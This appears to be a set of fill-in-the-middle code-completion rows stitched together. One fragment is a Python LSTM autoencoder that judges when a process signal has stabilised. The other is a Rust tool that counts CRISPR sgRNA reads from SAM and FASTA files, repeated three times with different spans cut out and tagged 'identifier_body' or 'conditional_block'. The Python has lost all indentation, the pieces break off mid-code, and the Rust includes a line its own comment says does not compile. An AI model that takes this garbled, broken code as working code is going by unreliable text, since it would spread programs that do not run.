validLossList.append(loss.item())
MeanOfTrainLoss = np.mean(trainLossList)
MeanOfValidLoss = np.mean(validLossList)
if MeanOfValidLoss < bestLoss:
countWithoutImprovement = 0
bestLoss = MeanOfValidLoss
bestModel = copy.deepcopy(model.state_dict())
else:
countWithoutImprovement += 1
if epoch >= 50 and countWithoutImprovement == earlyStopThreshold:
print('Early stopping!')
break
print(f'Epoch {epoch}: train loss {MeanOfTrainLoss} val loss {MeanOfValidLoss}')
model.load_state_dict(bestModel)
# plot result [optional]
fig, axs = plt.subplots(
nrows=2,
ncols=6,
sharex=True,
sharey=True,
figsize=(16, 8)
)
for i, data in enumerate(train[:6]):
self.plotPrediction(data, model, title='Train', ax=axs [0, i])
for i, data in enumerate(valid[:6]):
self.plotPrediction(data, model, title='Valid', ax=axs [1, i])
fig.tight_layout()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_result.png')
plt.close()
return model
def setThreshold(self, autoEncoder, train, valid):
_, trainLosses = self.predict(autoEncoder, train)
_, validLosses = self.predict(autoEncoder, valid)
# plot loss distribution [optional]
sns.distplot(trainLosses, bins=50, kde=True)
sns.distplot(validLosses, bins=50, kde=True)
self.threshold = np.percentile(validLosses, 95)
self.statistics['threshold'] = self.threshold
@staticmethod
def predict(autoEncoder, dataset):
predictions, losses = [], []
criterion = nn.L1Loss(reduction='sum').to(device)
with torch.no_grad():
autoEncoder = autoEncoder.eval()
for seqTrue in dataset:
seqTrue = seqTrue.to(device)
seqPrediction = autoEncoder(seqTrue)
loss = criterion(seqPrediction, seqTrue)
predictions.append(seqPrediction.cpu().numpy().flatten())
losses.append(loss.item())
return predictions, losses
def saveModel(self, autoEncoder):
np.save('./model/' + str(self.paramIndex) + '_ae_statistics', self.statistics)
path = './model/' + str(self.paramIndex) + '_lstm_ae_model.pth'
torch.save(autoEncoder, path)
def loadModel(self):
self.statistics = np.load('./model/' + str(self.paramIndex) + '_ae_statistics.npy', allow_pickle=True).item()
self.threshold = self.statistics['threshold']
autoEncoder = torch.load('./model/' + str(self.paramIndex) + '_lstm_ae_model.pth')
autoEncoder = autoEncoder.to(device)
return autoEncoder
def evaluate(self, autoEncoder):
stable = self.normalData.data.x_data
unstable = self.unstableData.data.x_data
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
stableStarted = len(unstable) - self.windowSize
originWindowSize = self.windowSize
# wait for finding the cycle
cycle, waitTime = None, 0
for i in range(stableStarted):
cycle = self.findCycle(unstable[: i + self.windowSize])
if cycle is None:
continue
else:
waitTime = i + 1
break
if i == stableStarted - 1:
cycle = originWindowSize
originCycle = self.statistics['cycle']
if (cycle / originCycle) > 1:
self.threshold *= (cycle / originCycle)
elif (cycle / originCycle) < 1:
self.threshold *= 1 / (cycle / originCycle)
else:
pass
isWindowChanged = False
for i in range(len(unstable) - self.windowSize - waitTime):
i += waitTime
# sliding window
subSequence = unstable[i: i + self.windowSize]
# re-sampling (normal vs. unstable)
if cycle > originCycle and isWindowChanged is False:
self.windowSize = np.int(np.round(self.windowSize * (cycle / originCycle), 0))
isWindowChanged = True
continue
reSampledSeq = signal.resample(subSequence, np.int(np.round(len(subSequence) * np.float(originCycle / cycle))))
reSampledSeq = reSampledSeq[:originWindowSize]
mean, std = reSampledSeq.mean(), reSampledSeq.std()
# flatten dataset and min-max normalize
reSampledSeq = minMaxScaler.transform(reSampledSeq)
reSampledSeq = reSampledSeq.reshape(-1, originWindowSize)
testDataTensor, _, _ = self.convertToTensor(reSampledSeq)
prediction, loss = self.predict(autoEncoder, testDataTensor)
if loss < self.threshold:
lowerMean, upperMean, upperStd = self.statistics['lowerMean'], self.statistics['upperMean'], \
self.statistics['upperStd']
print(f'Mean lower bound({np.around(lowerMean, 3)}), Mean upper bound('
f'{np.around(upperMean, 3)}) vs. Mean({np.around(mean, 3)})')
print(f'Std upper bound({np.around(upperStd, 3)}) vs. Std({np.around(std, 3)})')
print(f'threshold({np.around(self.threshold, 2)}) vs. loss({np.around(loss[0], 2)})')
print(f'original cycle({np.around(originCycle, 1)}) vs. new cycle({np.around(cycle, 2)})')
# if lowerMean <= mean.item() <= upperMean and std.item() <= upperStd:
# self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
# stableStarted = i
# break
self.plotFigure(truth=reSampledSeq[0], pred=prediction[0], loss=loss[0])
stableStarted = i
break
self.printResult(self.normalData.data.x_data, unstable[i: i + self.windowSize], stableStarted)
# @staticmethod
def plotFigure(self, truth, pred, loss):
fig = plt.figure(figsize=(6, 6))
plt.plot(truth, label='true')
plt.plot(pred, label='reconstructed')
plt.title(f'loss:{np.around(loss, 2)}')
plt.legend()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_eval_result.png')
def printResult(self, stable, unstable, stableStarted):
stableMean, stableStd = float(np.mean(stable)), float(np.std(stable))
resultMean, resultStd = float(np.mean(unstable)), float(np.std(unstable))
print('stableMean:', np.round(stableMean, 2), ' vs. resultMean: ', np.round(resultMean, 2))
print('stableStd: ', np.round(stableStd, 3), ' vs. resultStd: ', np.round(resultStd, 3))
print("==" * 30)
print("unstable time:", self.unstableData.data.time_axis['act_time'].get(0))
print("settling time:", stableStarted * 5, "minutes")
print("stable time:", self.unstableData.data.time_axis['act_time'].get(stableStarted))
print("decision time:", self.unstableData.data.time_axis['act_time'].get(stableStarted + self.windowSize - 1))
print("~~" * 30)
print()
return
def plotPrediction(self, data, model, title, ax):
predictions, loss = self.predict(model, [data])
ax.plot(data, label='true')
ax.plot(predictions[0], label='reconstructed')
ax.set_title(f'{title} (loss:{np.around(loss[0], 2)})')
ax.legend()
| print('paramIndex:', self.paramIndex)
stable = self.normalData.data.x_data
# plot distribution [optional]
# sns.distplot(stable, label="train")
# plt.legend()
# plt.show()
# mix max scaler
minMaxScaler = MinMaxScaler()
minMaxScaler.fit(stable)
# divide dataset into train set and validation set
trainData, validationData = self.normalData.divideData(stable, self.wantToShuffle)
# remove some data for reshaping
trainDataMissing = trainData.shape[0] % self.windowSize
validationDataMissing = validationData.shape[0] % self.windowSize
if trainDataMissing != 0:
trainData = trainData[: -trainDataMissing]
if validationDataMissing != 0:
validationData = validationData[: -validationDataMissing]
# plot dataset [optional]
print("data shape:", trainData.shape, validationData.shape)
plt.plot(trainData, label="train")
plt.plot(validationData, label="validate")
plt.legend()
# plt.show()
plt.savefig('figures/' + str(self.paramIndex) + '_AE_train_valid_data.png')
plt.close()
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize) # 12(window)
validationData = validationData.reshape(-1, self.windowSize)
print("data shape:", trainData.shape, validationData.shape)
# collect mean, std
meanOfTrainData, stdOfTrainData = self.collectMeanStd(trainData)
meanOfValidationData, stdOfValidationData = self.collectMeanStd(validationData)
meanOfTrainData += meanOfValidationData
stdOfTrainData += stdOfValidationData
# find cycle of repeated trend
cycle = self.findCycle(stable)
# save statistic values [left tail, right tail, right tail(std), cycle]
self.statistics = {'lowerMean': np.percentile(meanOfTrainData, 5),
'upperMean': np.percentile(meanOfTrainData, 95),
'upperStd': np.percentile(stdOfTrainData, 95), 'cycle': cycle}
# flatten dataset and min-max normalize
trainData = minMaxScaler.transform(trainData.reshape(-1, 1))
validationData = minMaxScaler.transform(validationData.reshape(-1, 1))
# reshape inputs [timesteps, samples] into subsequence (sliding window)
trainData = trainData.reshape(-1, self.windowSize)
validationData = validationData.reshape(-1, self.windowSize)
trainDataTensor, lengthOfSubsequence, numberOfFeatures = self.convertToTensor(trainData)
validationDataTensor, _, _ = self.convertToTensor(validationData)
return trainDataTensor, validationDataTensor, lengthOfSubsequence, numberOfFeatures | identifier_body |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch |
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
}
| {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
} | conditional_block |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) | {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
Regex::new(mapping_match_pattern).expect("programmer error in mapping match regexp");
let mut count_total : u32 = 0;
let mut count_matched : u32 = 0;
for l in sam_file {
let next_line = l.expect("io-error reading from samfile");
// fast forward the sam header to the beginning of the
// alignment section - skip the header starting with @
if next_line.starts_with('@') {
continue;
}
// ----------the basic algorithm starts here ---
// now split
let al_arr: Vec<&str> = next_line.trim_right().split("\t").collect();
//only count the mapped read if 2nd field, the FLAG, indicates an alignment that is neither rev-complementary, nor unmapped, nor a mutliple alignment (FLAG = 0)
if(al_arr[1] != "0") {
continue;
}
count_total += 1;
//println!("{}", al_arr[2]);
//let gene_id = al_arr[2].split("_").nth(0).unwrap();
let mut found_mismatch = false;
// the sam file format is so BAD that a certain position of any optional field cannot be
// predicted for sure, so we need to parse the whole line for the mismatch string
// at least we know that we have to search from the right end to the left because in the
// beginning we have mandantory fields (first 11)
let mut mm_positions: Vec<usize> = Vec::new();
for caps in sam_mismatch_re.captures_iter(&next_line) {
let mm_pos: i32 = caps[1].parse().expect("programmer error: cannot parse string to number for iterating");
mm_positions.push(mm_pos as usize);
found_mismatch = true;
}
// do some prechecks to save computation time...skip the obvious
let skip = !mismatch_in_pattern && found_mismatch || mismatch_in_pattern && !found_mismatch;
if !skip {
// build / expand cigar string, e.g. 20M -> MMMMMMMMMMMMMMMMMMMM, 10M,1I,5D ->
// MMMMMMMMMMIDDDDD, 20M1D =
let mut match_string = String::new();
for caps in match_string_re.captures_iter(&al_arr[5]) {
//println!("{}", &caps[1]);
let until_pos: i32 = caps[1].parse().expect("programmer error: cannot convert string to number for iterating");
for _ in 0..until_pos {
match_string.push_str(&caps[2]);
}
}
// now introduce mismatches int the string if needed
if found_mismatch {
for pos in mm_positions {
// TODO: next line is not compiling
match_string.insert_str(pos, "X");
}
}
// now apply input mapping regex
if mapping_match_re.is_match(&match_string) {
count_matched += 1;
match gene_matches.get_mut(al_arr[2].split("_").nth(0).unwrap()) {
Some(v) => *v += 1,
None => println!("illegal gene id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
//ref_libIds.get(&x).ok_or("illegal gene id encountered").map(|v| v += 1);
match ref_libIds.get_mut(&al_arr[2].to_owned().clone()) {
Some(v) => *v += 1,
None => println!("illegal reference lib id encountered '{}'", &al_arr[2].split("_").nth(0).unwrap())
}
}
}
// --------- end of basic algorithm ---
}
// (mapped_geneids, count_total)
(count_total, count_matched)
} | identifier_body | |
main.rs | // #![feature(alloc_system)]
// extern crate alloc_system;
extern crate regex;
extern crate argparse;
use regex::Regex;
use std::fs::File;
use argparse::{ArgumentParser, Store};
use std::collections::HashSet;
use std::collections::BTreeMap;
use std::io::{BufReader, BufRead, BufWriter, Write};
// print $seqgene "Gene\tCount\tdesigns-present\n";
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// open ($stats, ">", $logfile) or die $!;
// print $stats "Total\tMatched\n";
// print $stats $counttotal . "\t" . $countmatched . "\n";
// close($stats);
fn main() {
// buffers to hold parsed arguments
let mut fasta_file_arg = String::new();
let mut sam_file_arg = String::new();
let mut mapping_match_pattern = String::from("M{20,21}$");
let mut geneid_pattern = String::from("_");
let mut logfile_out = String::from("./log.out");
// TODO: change argparse to clap as suggested by Jules
parse_args(&mut fasta_file_arg,
&mut sam_file_arg,
&mut mapping_match_pattern,
&mut geneid_pattern,
&mut logfile_out);
//let fasta_re = Regex::new(&format!(r"^>(.+){}", geneid_pattern))
let fasta_re = Regex::new(r"^>(.+)")
.expect("programmer error in accession regex");
let mismatch_in_pattern = mapping_match_pattern.contains('x') ||
mapping_match_pattern.contains('X');
let mut gene_matches = BTreeMap::<String, u32>::new();
let mut ref_libIds = BTreeMap::<String, u32>::new();
let mut targets_matched = BTreeMap::<String, u32>::new();
//let mut geneIds = TreeMap::<String, u32>::new();
// first parse the reference genome from the fasta file
process_fasta(&fasta_file_arg, &fasta_re, geneid_pattern, &mut gene_matches, &mut ref_libIds);
// now parse the samfile
//let (mapped_geneids, count_total) =
let (count_total, count_matched) =
process_sam(&sam_file_arg, mismatch_in_pattern, &mapping_match_pattern, &mut gene_matches, &mut ref_libIds);
let out_base_name = sam_file_arg.replace(".sam", "");
let mut design_out_file =
BufWriter::new(File::create(format!("{}-designs.txt", out_base_name)).expect("problem opening output file"));
design_out_file.write_all(b"sgRNA\tCount\n").unwrap();
// let mut uniqLibIds
for (k, v) in &ref_libIds {
design_out_file.write_all(k.replace("\"", "").as_bytes()).unwrap();
design_out_file.write_all(b"\t").unwrap();
design_out_file.write_all(v.to_string().as_bytes()).unwrap();
design_out_file.write_all(b"\n").unwrap();
if(*v > 0) {
let gid = k.split("_").nth(0).unwrap().to_string();
*targets_matched.entry(gid).or_insert(0) += 1;
}
//println!("{}\t{}", k.replace("\"", ""), v);
}
let mut genes_out_file =
BufWriter::new(File::create(format!("{}-genes.txt", out_base_name)).expect("problem opening output file"));
genes_out_file.write_all(b"Gene\tCount\tdesigns-present\n").unwrap();
for (k, v) in &gene_matches {
genes_out_file.write_all(k.as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(v.to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\t").unwrap();
genes_out_file.write_all(targets_matched.get(k).unwrap().to_string().as_bytes()).unwrap();
genes_out_file.write_all(b"\n").unwrap();
}
// foreach $target ( sort keys %reads) {
// print $seqgene $target."\t".$reads{$target}{"genematch"}."\t".$reads{$target}{"targetmatched"}."\n";
// write log file
let mut log_file =
BufWriter::new(File::create(format!("{}_log.txt", fasta_file_arg)).expect("problem opening output file"));
log_file.write_all(b"Total\tMatched\n").unwrap();
log_file.write_all(b"\n").unwrap();
log_file.write_all(count_total.to_string().as_bytes()).unwrap();
log_file.write_all(b"\t").unwrap();
log_file.write_all(count_matched.to_string().as_bytes()).unwrap();
log_file.write_all(b"\n").unwrap();
// FIXME: two times "count_total"?
//println!("Total\tMatched");
//println!("{}\t{}", count_total, count_total);
}
fn parse_args(fasta_file_arg: &mut String,
sam_file_arg: &mut String,
mapping_match_pattern: &mut String,
geneid_pattern: &mut String,
logfile_out: &mut String) {
// put the argparsing in its own scope
let mut cli_parser = ArgumentParser::new();
cli_parser.set_description("mapper for CRISPRanalyzer");
cli_parser.refer(fasta_file_arg)
.add_option(&["-f", "--fasta-file"], Store, "Fasta Library Input File")
.required();
cli_parser.refer(sam_file_arg)
.add_option(&["-s", "--sam-file"], Store, "Sam Input file")
.required();
cli_parser.refer(mapping_match_pattern)
.add_option(&["-m", "--match-pattern"], Store, "Mapping match pattern e.g. M{20,21}$");
cli_parser.refer(geneid_pattern)
.add_option(&["-g", "--geneid-pattern"], Store, "GeneId pattern to parse, e.g. '_'");
cli_parser.refer(logfile_out).add_option(&["-l", "--logfile"], Store, "Logfile filename");
cli_parser.parse_args_or_exit();
}
fn process_fasta(fasta_file: &str, fasta_re: &Regex, geneid_pattern : String, gene_matches : &mut BTreeMap<String, u32>, ref_libIds: &mut BTreeMap<String, u32>) {
let fasta_file = BufReader::new(File::open(fasta_file).expect("Problem opening fastq file"));
for line in fasta_file.lines() {
let ln = line.expect("programmer error in reading fasta line by line");
ref_libIds.extend(
fasta_re.captures_iter(&ln)
// iterate over all Matches, which may have multiple capture groups each
.map(|captures: regex::Captures| {
let key = captures.get(1) // of this match, take the first capture group
.expect("fasta regex match should have had first capture group")
.as_str().to_owned(); // make Owned copy of capture-group contents
// add to gene_matches as well
gene_matches.insert(key.split("_").nth(0).unwrap().to_string(), 0);
(key, 0)
}
)
);
}
}
fn process_sam(sam_file: &str,
mismatch_in_pattern: bool,
mapping_match_pattern: &str,
gene_matches : &mut BTreeMap<String, u32>,
ref_libIds: &mut BTreeMap<String, u32>)
-> (u32,u32) {
//-> (HashMap<String, i32>, u32) {
// our buffer for the sam parser
let sam_file = BufReader::new(File::open(sam_file).expect("Problem opening fastq file"))
.lines();
let sam_mismatch_re =
Regex::new(r"MD:Z:([0-9]+)([A-Z]+)[0-9]+").expect("programmer error in mismatch regex");
let match_string_re = Regex::new(r"([0-9]+)([MIDSH])").expect("programmer error in match regex");
let mapping_match_re =
